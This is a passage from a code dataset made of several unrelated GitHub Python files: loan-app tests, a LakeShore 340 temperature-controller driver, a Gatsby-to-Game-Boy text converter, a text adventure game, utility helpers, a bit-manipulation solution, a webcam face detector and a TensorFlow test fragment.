for collectLoanDetails() function\ndef test_collect_loan_details_input(monkeypatch):\n #\n #GIVEN a user uses the loan app\n #WHEN a user enters their loan details correctly\n #THEN the app will correctly run\n #\n user_input = ['100000', '30', '0.06']\n monkeypatch.setattr('builtins.input', lambda x: user_input.pop(0))\n loan 
= collectLoanDetails()\n print(\"\\r\") # carriage return\n print(\" -- collect_loan_details functional test\")\n assert loan.loanAmount == 100000\n assert loan.numberOfPmts == 30 * 12\n assert loan.annualRate == 0.06\n\ndef test_collect_loan_details_invalid_input(monkeypatch):\n #\n #GIVEN a user uses the loan app\n #WHEN a user enters their loan details incorrectly\n #THEN a value error will occur\n #\n user_input = ['abc', '30', '0.06']\n monkeypatch.setattr('builtins.input', lambda x: user_input.pop(0))\n print(\"\\r\")\n print(\" -- invalid_loan_details functional test\")\n with pytest.raises(ValueError):\n collectLoanDetails()\n\n# Functional test for main() function\ndef test_main_output(capsys):\n #\n #GIVEN a user uses the loan app\n #WHEN the calculations are made\n #THEN the app prints an accurate statement\n #\n # Capture the stdout to check the output\n loan = Loan(100000, 30, 0.06) # Set up a Loan object with known values\n loan.calculateLoanPmt()\n \n print(\"\\r\")\n print(\" -- main functional tesr\")\n expected_output = \"Your monthly payment is: $599.55\"\n assert main() == expected_output","repo_name":"aholkefarnam/loan_testing","sub_path":"starter_test.py","file_name":"starter_test.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24941013321","text":"import pyvisa\t\nimport ResourceManage\nimport numpy as np\n\n\n\nclass LSall():\n\tdef __init__(self,rm,idn_dict):\n\t\tself._hrange_dict = {'OFF':'0', '0':'OFF', '2.5mW':'1', '1':'2.5mW', '25mW':'2', '2':'25mW', '250mW':'3', '3':'250mW', '2.5W':'4', '4':'2.5W', '25W':'5', '5':'25W'}\n\t\tself.GPIBaddress = idn_dict['LSCI,MODEL340,340511,013102']\n\t\tself.device = rm.open_resource(self.GPIBaddress)\n\t\tself._ctrlloop = '1'\n\t\tself._channel = self.device.query('CSET? ' + self._ctrlloop).rstrip().split(',')[0]\n\t\tself.channel = self._channel #Initialing, to configure the control loop. E.g. change unit to K and switch it on\n\t\tself._sensortype = self.device.query('INTYPE? ' + self._channel).rstrip().split(',')[0]\n\t\tself._inputcurve = self.device.query('INCRV? ' + self._channel).rstrip()\n\t\tself._hrange = self._hrange_dict[self.device.query('RANGE?').rstrip()]\n\t\tself._rampmode = float(self.device.query('RAMP? ' + self._ctrlloop).rstrip().split(',')[0])\n\t\tself._ramprate = float(self.device.query('RAMP? ' + self._ctrlloop).rstrip().split(',')[1])\n\t\tself._P = float(self.device.query('PID? ' + self._ctrlloop).rstrip().split(',')[0])\n\t\tself._I = float(self.device.query('PID? ' + self._ctrlloop).rstrip().split(',')[1])\n\t\tself._D = float(self.device.query('PID? ' + self._ctrlloop).rstrip().split(',')[2])\n\t\tself._setpoint = float(self.device.query('SETP? ' + self._ctrlloop).rstrip())\n\t\tself._nowtemp = float(self.device.query('KRDG? ' + str(self.channel)).rstrip())\n\t\t#self._nowsrdg = float(self.device.query('SRDG? ' + str(self.channel)).rstrip())\n\t\tself._houtput = float(self.device.query('HTR? ').rstrip())\n\n\n\t@property\n\tdef channel(self):\n\t\tself._channel = self.device.query('CSET? ' + self._ctrlloop).rstrip().split(',')[0]\n\t\treturn self._channel\n\t@channel.setter\n\tdef channel(self, channel):\n\t\tself._channel = str(channel)\n\t\tself.device.write('CSET ' + self._ctrlloop + ',' + str(channel) + ',1,1') #',1,1' means unit=Kelvin and loop=ON respectively\n\t\t\n\t\t\n\t@property\n\tdef sensortype(self):\n\t\tself._sensortype = self.device.query('INTYPE? 
' + self._channel).rstrip().split(',')[0]\n\t\treturn self._sensortype\n\t@channel.setter\n\tdef sensortype(self, sensortype):\n\t\tself.device.write('INTYPE ' + self._channel + ',' + str(sensortype))\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef inputcurve(self):\n\t\tself._inputcurve = self.device.query('INCRV? ' + self._channel).rstrip()\n\t\treturn self._inputcurve\n\t@inputcurve.setter\n\tdef inputcurve(self, inputcurve):\n\t\tif int(inputcurve) in [35, 36, 42]:\n\t\t\tif int(inputcurve) in [35, 42]:\n\t\t\t\tself.sensortype = 8\n\t\t\telse:\n\t\t\t\tself.sensortype = 1\n\t\t\tself.device.write('INCRV ' + self._channel + ',' + str(inputcurve))\n\t\t\tself.device.write('CSET ' + self._ctrlloop + ',' + self._channel + ',1,1') #Rewrite CSET to keep unit 'K' and loop on, cause the loop might turn off for unknown reasons\n\t\telse:\n\t\t\traise ValueError(\"Input curve %02d is not in use\" %inputcurve)\n\t\t\t\n\n\t@property\n\tdef incrvMenu(self):\n\t\tif self._channel == 'A':\n\t\t\tself._incrvMenu = ['35 [MAGNO+Amb;Cernox]','36 [DAC;Silicon]']\n\t\telif self._channel == 'B':\n\t\t\tself._incrvMenu = ['42 [MAGNO;Cernox]']\n\t\treturn self._incrvMenu\n\t@incrvMenu.setter\n\tdef incrvMenu(self, newMenu):\n\t\tpass\n\n\n\n\t@property\n\tdef hrange(self):\n\t\tresponse = self.device.query('RANGE?').rstrip()\n\t\thrange = self._hrange_dict[response]\n\t\tself._hrange = hrange\n\t\treturn self._hrange\n\t@hrange.setter\n\tdef hrange(self,hrange):\n\t\tself.device.write('RANGE ' + self._hrange_dict[hrange])\n\t\t\n\t@property\n\tdef rampmode(self):\n\t\trampmode = self.device.query('RAMP? ' + self._ctrlloop).rstrip().split(',')[0]\n\t\tself._rampmode = int(rampmode)\n\t\treturn self._rampmode\n\t@rampmode.setter\n\tdef rampmode(self, rampmode):\n\t\tif rampmode == '1':\n\t\t\tself.device.write('RAMP '+ self._ctrlloop + ',' + str(rampmode) + ',' + str(self.ramprate))\n\t\telse:\n\t\t\tself.device.write('RAMP '+ self._ctrlloop + ',' + str(rampmode))\n\n\t@property\n\tdef ramprate(self):\n\t\tramprate = self.device.query('RAMP? ' + self._ctrlloop).rstrip().split(',')[1]\n\t\tself._ramprate = float(ramprate)\n\t\treturn self._ramprate\n\t@ramprate.setter\n\tdef ramprate(self, ramprate):\n\t\tif float(self.rampmode) != 0:\n\t\t\tself.device.write('RAMP '+ self._ctrlloop + ',' + str(self.rampmode) + ',' + str(ramprate))\n\t\telif float(self.rampmode) == 0:\n\t\t\tself.device.write('RAMP '+ self._ctrlloop + ',' + str(self.rampmode))\n\n\t@property\n\tdef P(self):\n\t\tP = self.device.query('PID? ' + self._ctrlloop).rstrip().split(',')[0]\n\t\tself._P = float(P)\n\t\treturn self._P\n\t@P.setter\n\tdef P(self,P):\n\t\tself.device.write('PID ' + self._ctrlloop + ',' + str(P) + ',' + str(self.I) + ',' + str(self.D))\n\n\t@property\n\tdef I(self):\n\t\tI = self.device.query('PID? ' + self._ctrlloop).rstrip().split(',')[1]\n\t\tself._I = float(I)\n\t\treturn self._I\n\t@I.setter\n\tdef I(self,I):\n\t\tself.device.write('PID ' + self._ctrlloop + ',' + str(self.P) + ',' + str(I) + ',' + str(self.D))\n\n\t@property\n\tdef D(self):\n\t\tD = self.device.query('PID? ' + self._ctrlloop).rstrip().split(',')[2]\n\t\tself._D = float(D)\n\t\treturn self._D\n\t@D.setter\n\tdef D(self,D):\n\t\tself.device.write('PID ' + self._ctrlloop + ',' + str(self.P) + ',' + str(self.I) + ',' + str(D))\n\n\t@property\n\tdef setpoint(self):\n\t\tresponse = self.device.query('SETP? 
' + self._ctrlloop).rstrip()\n\t\tself._setpoint = float(response)\n\t\treturn self._setpoint\n\t@setpoint.setter\n\tdef setpoint(self, setpoint):\n\t\tself.device.write('SETP ' + self._ctrlloop + ',' + str(setpoint))\n\t\t\n\t@property\n\tdef nowtemp(self):\n\t\tresponse = self.device.query('KRDG? ' + str(self.channel)).rstrip()\n\t\tself._nowtemp = float(response)\n\t\treturn self._nowtemp\n\t\t\n\t@property\n\tdef nowsrdg(self):\n\t\tresponse = self.device.query('srdg? ' + str(self.channel)).rstrip()\n\t\tself._srdg = float(response)\n\t\treturn self._srdg\n\n\t@property\n\tdef houtput(self):\n\t\tresponse = self.device.query('HTR? ' + str(self.channel)).rstrip()\n\t\tself._houtput = float(response)\n\t\treturn self._houtput\n\t\t\n\t\t\n\t\t\n\t\t\n\tdef configCurve(self,curveDataFile,curveNo):\n\t\tdf = np.loadtxt(curveDataFile,skiprows=2)\n\t\tfor i in range(len(df)):\n\t\t\tcmd = 'CRVPT ' + str(curveNo) + ',' + str(i+1) + ',' + str(round(df[i][1],4)) + ',' + str(round(df[i][0],4))\n\t\t\tprint(cmd)\n\t\t\tself.device.query(cmd)\n\t\treturn\n\n\n\n \n\nif __name__ == \"__main__\":\n\n\trm = ResourceManage.rm_initiate()\n\tidn_dict = ResourceManage.rm_dict()\n\tprint(idn_dict)\n\tLS = LSall(rm,idn_dict)\n\n\n\t#print(LS.channel)\n\t#LS.inputcurve = 36\n\t#print(LS.device.write('INCRV 36,A'))\n\t#print(LS.device.query('INTYPE? A').rstrip())\n\tprint(LS.device.query('CSET? 1').rstrip())\n\t#print(LS.inputcurve)\n\t#print(LS.incrvMenu)\n\t\n\t#LS.setpoint = '300'\n\n\t#print(LS.device.query('CRVDEL 42'))\n\t#print(LS.device.query('CRVHDR? 42'))\n\t#print(LS.device.query('CRVHDR 42,Cernox,X-142027,3,310.0,1'))\n\t#print(LS.device.query('CRVHDR? 42'))\n\n\n\n\t#### Load temperature curve calibrated data points\n\n\t#curveDataFile = r\"\\\\S4\\Datenpool\\Yuk Tai\\Python\\Cenox calibration curve\\X142027\\X142027.dat\"\n\t#LS.configCurve(curveDataFile,42)\n\t#curveDataFile = r\"\\\\S4\\Datenpool\\Dielectric group\\Temperature sensor calibration curves\\Cenox calibration curve\\Cernox_Default_NotStandard.dat\"\n\t#LS.configCurve(curveDataFile,43) \n\t\t\n\n\t\t\n\t#print(LS.device.query('CRVHDR? 43'))\n\t#print(LS.device.query('CRVHDR 43, Cernox, Default, 3, 500, 1'))\n\t#print(LS.device.query('CRVHDR? 
43'))\n","repo_name":"tairrchan/Novocontrol-Lakeshore-Controller","sub_path":"LakeShore340Init.py","file_name":"LakeShore340Init.py","file_ext":"py","file_size_in_byte":7224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27066048670","text":"import os\nimport io\n\nWIDTH = 20\nHEIGHT = 18\n\nfile = 1\npage = 0\nf_name = \"gatsby_\" + str(file)\ncharacter_pointer = 0\navailable_height = HEIGHT\nfilepath = \"res/\"\n\ndef seek_size(current):\n pos = current.tell()\n current.seek(0, io.SEEK_END)\n size = current.tell()\n current.seek(pos) # back to where we were\n return size\n\ndef initialize_cfile(current, f_name):\n current.write(\"#include \\n\")\n current.write(\"#pragma bank 255\\n\")\n current.write(\"BANKREF(\" + f_name + \")\\n\")\n\ndef start_page():\n global page\n global f_name\n page = page + 1\n current.write(\"const unsigned char \" + f_name + \"_\" + str(page) + \"[] = {\\n\")\n global character_pointer\n global available_height\n character_pointer = 0\n available_height = HEIGHT - 1\n return\n\ndef end_page():\n current.write(\"};\\n\\n\")\n return\n\ndef end_line():\n global character_pointer\n global available_height\n global file\n global current\n global f_name\n #fill the rest of the width with empty chars\n available_width = WIDTH-character_pointer\n for i in range(available_width):\n place_character(\" \")\n current.write(\"\\n\")\n character_pointer = 0\n if(available_height == 0):\n #go to next page\n end_page()\n if(seek_size(current) > 14336):\n current.close()\n #exit()\n #start next c file\n file += 1\n #if file == 4:\n # exit()\n f_name = \"gatsby_\" + str(file)\n current = open(filepath + f_name + \".c\", \"a\", encoding=\"utf8\")\n initialize_cfile(current, f_name)\n start_page()\n else:\n available_height = available_height - 1\n\ndef write_next_line(line):\n if(line == \"\\n\"):\n #finish current line and write an empty one\n end_line()\n end_line()\n return\n words = line.split()\n global character_pointer\n global available_height\n for word in words:\n #need to go for next line\n available_width = WIDTH-character_pointer\n if(len(word) > WIDTH-character_pointer):\n end_line()\n \n #word fits, put it in\n for char in word:\n place_character(char)\n available_width = WIDTH-character_pointer\n if(available_width > 0):\n place_character(' ')\n\ndef place_character(ch):\n ### special characters\n if(ch == '“' or ch == '”'):\n ch = '\"'\n if(ch == '’'):\n ch = '\\''\n if(ch == '—'):\n ch = '-'\n if(ord(ch) > 255):\n ch = '?'\n ###\n ch_tile_val = hex(ord(ch) - 32)\n global character_pointer\n if(available_height == 0 and character_pointer == WIDTH-1):\n current.write(str(ch_tile_val))\n else:\n current.write(str(ch_tile_val) + \", \")\n character_pointer += 1\n\n#### MAIN ####\n# delete existing c files first\nfile_exists = True\niterator = 1\nwhile(file_exists):\n searched_file = \"gatsby_\" + str(iterator)\n if os.path.exists(filepath + searched_file + \".c\"):\n os.remove(filepath + searched_file + \".c\")\n iterator += 1\n else:\n file_exists = False\n# delete the header\nif os.path.exists(filepath + \"gatsby.h\"):\n os.remove(filepath + \"gatsby.h\")\n\n\nwith open('gatsby.txt', encoding=\"utf8\") as gatsby:\n current = open(filepath + f_name + \".c\", \"a\", encoding=\"utf8\")\n #header = open(filepath + \"gatsby.h\", \"a\", encoding=\"utf8\")\n initialize_cfile(current, f_name)\n start_page()\n for line in gatsby:\n 
if(line.find(\"------------------------------------------------------------------------\") != -1):\n #end_page()\n #current.close()\n #exit()\n #fill rest of the page with empty char\n while(available_height != 0):\n end_line()\n write_next_line(line)\n while(available_height != 0):\n end_line()\n end_page()\n current.close()\n\n","repo_name":"antonovtum/The_Great_Gatsby_gb","sub_path":"decomp.py","file_name":"decomp.py","file_ext":"py","file_size_in_byte":3895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27586396980","text":"# Adventure Game project designed for Maryville University\n# SWDV 600: Intro to Programming\n\n# Running this file produces and runs an Adventure Game instance\n\nfrom os import system, name as os_name\nfrom random import random, randrange\nfrom player import Player\nfrom enemies import Crab, Philosopher, ExistentialCrisis, BoltzmannBrain\n\nclass AdventureGame:\n 'AdventureGame().run() produces and runs an instance of the game'\n\n def __init__(self):\n \"\"\"\n Produces an Adventure Game instance that tracks moves left, \n whether the game is over, whether the treasure was found, \n a list of possible encounters, the current enemy, and the player\n e.g. AdventureGame()\n \"\"\"\n self.moves = 10\n self.game_over = False\n self.treasure_found = False\n self.possible_encounters = [\n 'Pages', 'Crab', 'Philosopher', 'Existential', 'Boltzmann'\n ]\n self.current_enemy = None\n self.player = None\n\n def get_moves(self):\n \"Returns the number of moves left\"\n return self.moves\n\n def is_game_over(self):\n \"Returns whether the game is over\"\n return self.game_over\n \n def was_treasure_found(self):\n \"Returns whether the treasure was found\"\n return self.treasure_found\n\n def get_encounters(self):\n \"Returns a copy of the list of possible encounters\"\n return self.possible_encounters[:]\n\n def get_enemy(self):\n \"Returns the current enemy\"\n return self.current_enemy\n\n def get_player(self):\n \"Returns the player instance\"\n return self.player\n\n def decrement_moves(self):\n \"Decreases the remaining moves by 1\"\n self.moves -= 1\n\n def end_game(self):\n \"Sets the game over variable to true\"\n self.game_over = True\n\n def is_battle_over(self):\n \"Returns whether the current battle is over\"\n return not (self.get_enemy().get_energy() > 0 and self.get_player().get_energy() > 0)\n\n def set_up_player(self):\n \"Sets up the player instance for a game\"\n while True:\n name = input('\\nWhat is your name ( to submit)? ')\n\n # Validates name length\n if len(name) == 0:\n print('You didn\\'t enter anything! :)')\n elif len(name) > 35:\n print('That\\'s a really long name! Please enter something shorter. 
:)')\n else:\n break\n\n self.player = Player(name)\n\n def set_up_enemy(self, type):\n \"Sets up current enemy based on type\"\n if type == 'Crab':\n self.current_enemy = Crab()\n elif type == 'Philosopher':\n self.current_enemy = Philosopher()\n elif type == 'Existential':\n self.current_enemy = ExistentialCrisis()\n else:\n self.current_enemy = BoltzmannBrain()\n\n # Adds enemy to player encounter tracking\n self.get_player().add_encounter(self.get_enemy().get_name())\n\n def get_random_choice(self):\n \"Returns a random encounter choice based on probability\"\n rand_val = random()\n\n # Gets index of encounter choice\n if rand_val < 0.35:\n choice = 0\n elif rand_val < 0.55:\n choice = 1\n elif rand_val < 0.75:\n choice = 2\n elif rand_val < 0.95:\n choice = 3\n else:\n choice = 4\n\n return self.get_encounters()[choice]\n\n def get_attack_choice(self):\n \"Gets attack choice from user\"\n enemy_name = self.current_enemy.get_name().lower()\n if enemy_name[0] == 'b': \n enemy_name = enemy_name.capitalize()\n\n while True:\n choice = input(f'What do you do about the {enemy_name} (\"h\" for help)? ')\n\n if len(choice) > 0:\n choice = choice[0].lower()\n\n # Validates choice\n if choice in ['a', 'd', 'r', 'q']:\n break\n elif choice == 'h':\n self.print_attack_help(True)\n\n return choice\n\n def print_header(self):\n \"Prints header for a game instance\"\n print('\\n' + ('-'*29))\n print('Welcome to my Adventure Game!')\n print('-'*29)\n\n def print_help(self, additional=False):\n \"\"\"\n Prints help for main game loop\n Uses additional parameter for printing more info when \"h\" is pressed\n \"\"\"\n if additional:\n print('\\nWhen you take a move, there is a chance of encountering enemies')\n print('and possibly finding other interesting things.')\n print('If attacked, try not to let your energy get too low.\\n')\n\n print('Press \"w\" to start walking, \"s\" to check your status, \"l\" to look behind you, or \"q\" to quit')\n\n def print_attack_help(self, additional=False):\n \"\"\"\n Prints help for battles\n Uses additional parameter for printing more info when \"h\" is pressed\n \"\"\"\n if additional:\n print('\\nTry different options on enemies to figure out the best response!')\n print('\"q\" still ends the game when in a battle.\\n')\n\n print('Press \"a\" to attack, \"d\" to debate, or \"r\" to reassure')\n\n def print_intro(self):\n \"Prints intro for game instance\"\n print(f'Hello Captain {self.get_player().get_name()}!')\n\n print('\\nYou are on the beach of an uninhabited island searching for treasure.')\n print('You are not searching for just any treasure, this treasure is')\n print('rumored to contain the answers to one of life\\'s greatest mysteries.')\n print('This treasure is rumored to contain answers pertaining to the meaning of life,')\n print('as well as lots of gold!')\n\n self.clear_terminal(True)\n\n def print_battle_status(self, new_line=True):\n \"Prints the current status of a battle\"\n p = self.get_player()\n e = self.get_enemy()\n\n if new_line: print()\n status = f'Captain {p.get_name()}: {p.get_energy()} energy | {e.get_name()}: {e.get_energy()} energy'\n print(status)\n print('-'*len(status))\n\n def clear_terminal(self, wait=False):\n \"\"\"\n Clears the terminal screen\n Uses the wait parameter to determine whether to first prompt user for input\n \"\"\"\n if wait: input('\\nPress <Enter> to continue. 
')\n\n if os_name == 'nt':\n # Windows\n system('cls')\n else:\n # Linux or Mac\n system('clear')\n\n # Prints extra line\n print()\n\n # NOTE: This function does not clear in certain shell environments\n # This function should work properly when run in a terminal!\n\n def handle_player_defeat(self):\n \"Handles player energy hitting zero during a battle\"\n self.get_player().handle_defeat()\n\n # Handles player revive\n if self.get_player().get_energy() > 0:\n self.clear_terminal()\n self.print_battle_status(False)\n\n def handle_step(self):\n \"Handles the step between moves, in which encounters are generated\"\n print('\\nYou begin walking forward.')\n\n encounter = self.get_random_choice()\n player = self.get_player()\n\n if encounter == 'Pages':\n # Handles player finding between 1 and 8 pages\n num_pages = randrange(1, 9)\n player.add_trinket(num_pages)\n\n if num_pages == 1:\n print('\\nYou find a page.')\n else:\n print(f'\\nYou find {num_pages} pages.')\n else:\n # Handles enemy encounters / battles\n self.set_up_enemy(encounter)\n enemy = self.get_enemy()\n enemy.print_intro()\n self.clear_terminal(True)\n\n # Battle loop\n self.print_battle_status(False)\n while not self.is_battle_over():\n self.print_attack_help()\n choice = self.get_attack_choice()\n if choice == 'q': self.end_game(); break\n self.clear_terminal()\n\n player.attack_enemy(enemy, choice)\n if enemy.get_energy() > 0:\n enemy.attack_player(player)\n\n self.print_battle_status()\n if player.get_energy() <= 0:\n self.handle_player_defeat()\n\n if player.get_energy() > 0:\n enemy.print_outro()\n else:\n self.end_game()\n\n # Clears current enemy\n self.current_enemy = None\n\n def handle_move(self):\n \"Handles a move in the main game loop\"\n if self.get_moves() > 1:\n print(f'According to your map, you are {self.get_moves()} moves away from the treasure.')\n else:\n print('According to your map, you are only 1 move away from the treasure!')\n\n # Increase player energy by 25 when halfway through\n if self.get_moves() == 5 and self.get_player().get_energy() < 100:\n print('The thought of making it halfway to the treasure causes you to regain some energy!')\n self.get_player().add_energy(25)\n\n self.print_help()\n while True:\n # Gets player choice and handles error caused by input of zero length\n try:\n choice = input('What do you do (\"h\" for help)? ')[0].lower()\n except:\n choice = ''\n\n # Handles player choice \n if choice == 's':\n self.get_player().print_status()\n elif choice == 'l':\n self.get_player().look_behind(self.get_moves())\n elif choice == 'h':\n self.print_help(True)\n\n # Breaks out of loop if \"w\" or \"q\" are selected\n if choice in ['w','q']: break\n\n if choice == 'w':\n self.handle_step()\n else:\n self.end_game()\n\n # Clears terminal between moves, waits for input if game is NOT over\n self.clear_terminal(not self.is_game_over())\n\n def handle_treasure(self):\n \"Handles player finding of treasure at end of game\"\n print('You find a rock with an engraving of an \"X\".')\n input('This must be the spot! Press <Enter> to continue. ')\n\n input('\\nYou pull out your trusty shovel. Press <Enter> to dig. ')\n input('You start digging. Press <Enter> to dig. ')\n input('You hit the top of something with your shovel. Press <Enter> to dig. ')\n print('You uncover a treasure chest and pull it out of the hole.')\n input('Press <Enter> to open the chest. 
')\n\n print('\\nYou break a lock and open the chest!')\n print('Within is lots of gold coins...')\n print('However, you don\\'t see anything related to the meaning of life.')\n input('Press <Enter> to investigate further. ')\n\n print('\\nYou reach into the sea of gold coins and pull out a scroll!')\n input('Press <Enter> to open the scroll. ')\n\n print('\\nYou awaken in your bed, realizing that it was just a dream.')\n self.treasure_found = True\n self.clear_terminal(True)\n\n def handle_game_over(self):\n \"Prints end of game stats\"\n if self.was_treasure_found():\n self.get_player().print_end_stats(True)\n else:\n self.get_player().print_end_stats(False)\n\n print('\\nGAME OVER!\\n')\n\n def run(self):\n \"Runs an instance of the Adventure Game\"\n self.print_header()\n self.set_up_player()\n self.print_intro()\n\n while not self.is_game_over():\n if self.get_moves() >= 1:\n self.handle_move()\n self.decrement_moves()\n else:\n self.handle_treasure()\n self.end_game()\n\n self.handle_game_over()\n\n# Produces an Adventure Game instance and calls its run method\nif __name__ == '__main__': AdventureGame().run()\n","repo_name":"bwilkins96/Python_Adventure_Game","sub_path":"adventure_game.py","file_name":"adventure_game.py","file_ext":"py","file_size_in_byte":11936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"10301984732","text":"import importlib\n\n\ndef get_nested_attr(obj, attr_path, skip=0):\n if isinstance(attr_path, str):\n attr_path = attr_path.split('.')\n for attr in attr_path[skip:]:\n obj = getattr(obj, attr)\n return obj\n\n\ndef get_import_path(obj):\n return '{}:{}'.format(obj.__module__, obj.__qualname__)\n\n\nclass UndefinedAttr:\n def __get__(self, instance, owner):\n raise NotImplementedError(\"Attribute not defined\")\n\n\ndef load_by_import_path(import_path):\n module_name, attr_path = import_path.split(':')\n obj = importlib.import_module(module_name)\n for attr in attr_path.split('.'):\n obj = getattr(obj, attr)\n return obj\n\n\ndef is_collection(obj):\n if isinstance(obj, str):\n return False\n try:\n iter(obj)\n except (TypeError, ValueError):\n return False\n else:\n return True\n\n\ndef iflatten(*args):\n \"\"\"\n Arguments may be nested collections - then they will be flattened.\n Also arguments may be not iterable at all - then they simply yielded.\n Examples:\n flatten([1, [2, 3, [4]], 5]) -> [1, 2, 3, 4, 5]\n flatten([1], 2, 3, [[4, 5]]) -> [1, 2, 3, 4, 5]\n :param args: objects, iterable or not\n :return: generator that yields non-iterable objects\n \"\"\"\n for arg in args:\n if is_collection(arg):\n yield from iflatten(*arg)\n else:\n yield arg\n\n\ndef flatten(*iterables):\n return list(iflatten(*iterables))\n\n\ndef iflatten_values(*args):\n for arg in args:\n if is_collection(arg):\n if isinstance(arg, dict):\n arg = arg.values()\n yield from iflatten_values(*arg)\n else:\n yield arg\n\n\ndef unstack(array, axis):\n if axis < 0:\n axis += array.ndim\n slice_start = (np.s_[:],) * axis\n return [array[slice_start+(i, ...)] for i in range(array.shape[axis])]\n\n\ndef flatten_values(*iterables):\n return list(iflatten_values(*iterables))\n\n\ndef fmap(function, *iterables):\n return list(map(function, *iterables))\n\n\ndef tilestr(*strings, gap=' ', gap_width=1, tostr=str):\n \"\"\"\n Build string for printing objects in two or more columns.\n Handles objects whose string representation contains many lines.\n\n Example usage:\n >>> x = np.zeros((3, 4))\n >>> y = np.ones((4, 3))\n >>> print(tilestr(x, y))\n 
[[ 0. 0. 0. 0.] [[ 1. 1. 1.]\n [ 0. 0. 0. 0.] [ 1. 1. 1.]\n [ 0. 0. 0. 0.]] [ 1. 1. 1.]\n [ 1. 1. 1.]]\n \"\"\"\n line_lists = fmap(str.splitlines, map(tostr, strings))\n\n # normalization: same width within lines list, same length of list\n n_max_lines = max(map(len, line_lists))\n for lines in line_lists:\n list_width = max(map(len, lines))\n for i, line in enumerate(lines):\n lines[i] += ' '*(list_width - len(line))\n lines.extend([' '*list_width]*(n_max_lines - len(lines)))\n\n gap *= gap_width\n tiled_lines = map(gap.join, zip(*line_lists))\n return '\\n'.join(tiled_lines)\n","repo_name":"nanfengpo/tictactoe_nn","sub_path":"tictactoe_nn/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21052537452","text":"def check(num):\n return num > 0 and (num & (num - 1) == 0)\n\n\ndef solve_one():\n input()\n arr = list(map(int, input().split()))\n for i in range(32):\n ans = 0xffffffff\n for e in arr:\n if e & (1 << i) != 0:\n ans = ans & e\n if check(ans) is True:\n print(\"YES\")\n return\n print(\"NO\")\n\n\ndef solver():\n T = int(input())\n for _ in range(T):\n solve_one()\n\n\nsolver()\n","repo_name":"ThinhNgVhust/BigO_Algorithms","sub_path":"Orange/W2_BitManipulation/6_Power of Two.py","file_name":"6_Power of Two.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20110486173","text":"import cv2\n# Esta línea de código inicializa el objeto `CascadeClassifier` `face_cascade` con el archivo XML\n# `haarcascade_frontalface_default.xml`. Este archivo XML contiene el modelo previamente entrenado\n# para detectar caras frontales utilizando el algoritmo de clasificadores en cascada basado en\n# características de Haar.\nface_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')\n\n# Initialize the webcam\n# `video = cv2.VideoCapture(0)` inicializa la cámara web para capturar fotogramas de vídeo. El\n# argumento `0` especifica el índice de la cámara que se utilizará. 
En este caso, \"0\" se refiere a la\n# cámara predeterminada, que suele ser la cámara web integrada en la mayoría de los sistemas.\nvideo = cv2.VideoCapture(0) # Use index 0 for the default camera (usually the built-in webcam)\n\nwhile True:\n # Read a frame from the webcam\n ret, frame = video.read()\n if not ret:\n break\n\n # Increase the contrast and brightness of the frame (adjust these values as needed)\n alpha = 1.5 # Contrast control\n beta = 50 # Brightness control\n frame = cv2.convertScaleAbs(frame, alpha=alpha, beta=beta)\n\n # Convert the frame to grayscale for face detection\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Detect faces in the grayscale frame\n faces = face_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5, minSize=(30, 30))\n\n # Draw rectangles around the detected faces\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n # Display the frame with face detection\n cv2.imshow('Face Detection', frame)\n\n # Exit the loop when the 'q' key is pressed\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Release the webcam and close the OpenCV window\nvideo.release()\ncv2.destroyAllWindows()\n","repo_name":"Diego-Osorio/wifi","sub_path":"detectMov.py","file_name":"detectMov.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4002817184","text":"from absl.testing import parameterized\n\nfrom tensorflow.python.eager import context\nfrom tensorflow.python.framework import _pywrap_python_api_info\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import test_util\nfrom tensorflow.python.platform import googletest\n\n# pylint: disable=g-long-lambda\n\n\n# Helper function to make expected output in examples more compact:\ndef Const(x):\n return constant_op.constant(x)\n\n\n@test_util.run_all_in_graph_and_eager_modes\nclass PythonAPIInfoTest(test_util.TensorFlowTestCase, parameterized.TestCase):\n\n def setUp(self):\n context.ensure_initialized()\n super(PythonAPIInfoTest, self).setUp()\n\n def makeConverterForGenOp(self, op_name):\n \"\"\"Returns a PythonAPIInfo for the given gen_op.\"\"\"\n api_info = _pywrap_python_api_info.PythonAPIInfo(op_name)\n api_info.InitializeFromRegisteredOp(op_name)\n return api_info\n\n def makeConverterFromParamSpecs(self,\n api_name,\n param_names,\n input_specs,\n attr_specs,\n defaults=()):\n \"\"\"Returns a PythonAPIInfo built from the given specs.\"\"\"\n api_info = _pywrap_python_api_info.PythonAPIInfo(api_name)\n api_info.InitializeFromParamSpecs(input_specs, attr_specs, param_names,\n defaults)\n return api_info\n\n # This test initializes a PythonAPIInfo from a registered\n # op, and then uses DebugInfo() to check that the internal state is\n # correct.\n @parameterized.named_parameters([\n # An op whose inputs have fixed dtypes.\n (\"RegexFullMatch\", \"RegexFullMatch\", \"DebugInfo for RegexFullMatch:\\n\"\n \" param_names=[input, pattern, name]\\n\"\n \" defaults_tuple=('RegexFullMatch',)\\n\"\n \" inputs=[\\n\"\n \" {index=0, name=input, is_list=0},\\n\"\n \" {index=1, name=pattern, is_list=0},]\\n\"\n \" inputs_with_fixed_dtype=[\\n\"\n \" {index=0, dtype=DT_STRING, is_list=0},\\n\"\n \" {index=1, dtype=DT_STRING, 